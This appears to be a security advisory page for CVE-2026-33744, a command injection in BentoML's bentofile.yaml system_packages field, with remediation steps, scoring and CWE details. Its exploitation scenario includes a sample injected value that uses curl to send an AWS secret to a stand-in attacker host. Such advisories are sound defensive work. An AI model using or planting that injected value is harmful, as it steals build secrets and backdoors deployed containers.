CVE-2026-33744: BentoML: command injection in bentofile.yaml containerize
GHSA-jfjg-vc52-wqvf HIGH CISA: ATTENDAny team running `bentoml containerize` on untrusted or externally-sourced bentofile.yaml files is exposed to arbitrary command execution at build time — a classic supply-chain injection point in MLOps pipelines. Patch to BentoML 1.4.37 immediately and treat bentofile.yaml with the same scrutiny as Dockerfile or CI/CD scripts. If you cannot patch, block unreviewed bentofile.yaml ingestion in your build pipelines.
What is the risk?
High risk for organizations with collaborative or automated MLOps pipelines where bentofile.yaml originates from shared repositories, model hubs, or external contributors. Exploitation is trivial — no ML expertise required, just knowledge of shell metacharacters. The local attack vector limits opportunistic internet exposure, but CI/CD systems routinely pull and build from external sources, effectively elevating this to a remote-exploitable scenario in practice. Build-time compromise is particularly dangerous because artifacts (container images) propagate downstream before detection.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| BentoML | pip | <= 1.4.36 | 1.4.37 |
Do you use BentoML? You're affected.
How severe is it?
What is the attack surface?
What should I do?
5 steps-
PATCH
Upgrade BentoML to >=1.4.37 immediately on all build hosts and CI/CD agents.
-
AUDIT
Review all bentofile.yaml files in your repositories for suspicious entries in
system_packages— values containing semicolons, ampersands, pipes, backticks, or$()are red flags. -
GATE
Add a pre-build lint step (grep/regex) to reject bentofile.yaml with non-alphanumeric characters in
system_packages. -
ISOLATE
Run
bentoml containerizein ephemeral, network-restricted build environments (no cloud metadata endpoint access, no production credential mounts). -
DETECT
Alert on unexpected outbound connections or file writes during Docker build phases in your SIEM/build logging.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-33744?
Any team running `bentoml containerize` on untrusted or externally-sourced bentofile.yaml files is exposed to arbitrary command execution at build time — a classic supply-chain injection point in MLOps pipelines. Patch to BentoML 1.4.37 immediately and treat bentofile.yaml with the same scrutiny as Dockerfile or CI/CD scripts. If you cannot patch, block unreviewed bentofile.yaml ingestion in your build pipelines.
Is CVE-2026-33744 actively exploited?
No confirmed active exploitation of CVE-2026-33744 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-33744?
1. PATCH: Upgrade BentoML to >=1.4.37 immediately on all build hosts and CI/CD agents. 2. AUDIT: Review all bentofile.yaml files in your repositories for suspicious entries in `system_packages` — values containing semicolons, ampersands, pipes, backticks, or `$()` are red flags. 3. GATE: Add a pre-build lint step (grep/regex) to reject bentofile.yaml with non-alphanumeric characters in `system_packages`. 4. ISOLATE: Run `bentoml containerize` in ephemeral, network-restricted build environments (no cloud metadata endpoint access, no production credential mounts). 5. DETECT: Alert on unexpected outbound connections or file writes during Docker build phases in your SIEM/build logging.
What systems are affected by CVE-2026-33744?
This vulnerability affects the following AI/ML architecture patterns: model serving, MLOps build pipelines, container registries, training pipelines.
What is the CVSS score for CVE-2026-33744?
CVE-2026-33744 has a CVSS v3.1 base score of 7.8 (HIGH). The EPSS exploitation probability is 0.26%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.001 AI Software AML.T0010.004 Container Registry AML.T0011 User Execution AML.T0050 Command and Scripting Interpreter AML.T0079 Stage Capabilities Compliance Controls Affected
What are the technical details?
Original Advisory
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.37, the `docker.system_packages` field in `bentofile.yaml` accepts arbitrary strings that are interpolated directly into Dockerfile `RUN` commands without sanitization. Since `system_packages` is semantically a list of OS package names (data), users do not expect values to be interpreted as shell commands. A malicious `bentofile.yaml` achieves arbitrary command execution during `bentoml containerize` / `docker build`. Version 1.4.37 fixes the issue.
Exploitation Scenario
A threat actor targeting an ML engineering team submits a pull request to an open-source BentoML model repository, modifying bentofile.yaml to include a malicious system_packages entry such as `curl http://attacker.com/exfil?k=$(cat /run/secrets/aws_key)`. When a developer or CI/CD pipeline runs `bentoml containerize` to build the model's serving container — a routine step before deployment — the injected command executes during the Docker RUN layer, exfiltrating build secrets or installing a persistent backdoor into the resulting container image. The compromised image is then pushed to the container registry and deployed to production model serving infrastructure.
Weaknesses (CWE)
CWE-94 Improper Control of Generation of Code ('Code Injection')
Primary
CWE-94 Improper Control of Generation of Code ('Code Injection')
Primary
CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
- [Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
- [Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H References
Timeline
Related Vulnerabilities
CVE-2025-54381 9.9 BentoML: unauthenticated SSRF via file upload URLs
Same package: bentoml CVE-2025-27520 9.8 BentoML: unauthenticated RCE via insecure deserialization
Same package: bentoml CVE-2025-32375 9.8 BentoML: RCE via insecure deserialization in runner
Same package: bentoml CVE-2024-9070 9.8 BentoML: unauthenticated RCE via runner deserialization
Same package: bentoml CVE-2026-35044 8.8 BentoML: malicious bento archive RCE via Jinja2 SSTI
Same package: bentoml